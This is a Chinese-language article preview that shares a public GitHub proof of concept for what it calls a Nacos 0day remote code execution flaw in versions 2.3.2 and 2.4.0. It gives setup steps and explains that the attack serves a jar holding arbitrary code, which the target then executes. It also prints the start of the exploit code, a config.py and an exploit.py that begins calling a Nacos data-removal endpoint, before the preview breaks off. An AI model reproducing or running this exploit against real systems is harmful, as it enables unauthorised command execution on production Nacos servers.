文章预览
云鸦安全团队在github上监测到公开的 nacos poc,特此进行分享。 项目地址: https://github.com/ayoundzw/nacos-poc [1] 前言 因为某些原因,公开一个nacos的0day。 环境准备 下载nacos2.3.2或2.4.0版本,解压,使用 startup.cmd -m standalone 启动nacos。 补充POC信息 POC是一个python项目,依赖requests和flask,请先使用requiments.txt安装依赖 1.配置config.py中的ip和端口,执行service.py,POC攻击需要启动一个jar包下载的地方,jar包里可以放任意代码,都可执行,我这里放了一个接收参数执行java命令的 2.执行exploit.py,输入地址和命令即可执行。 漏洞利用代码 config.py server_host = '127.0.0.1' server_port = 5000 exploit.py import random import sys import requests from urllib.parse import urljoin import config # 按装订区域中的绿色按钮以运行脚本。 def exploit(target, command, service): removal_url = urljoin(target,'/nacos/v1/cs/ops/data/remov
………………………………
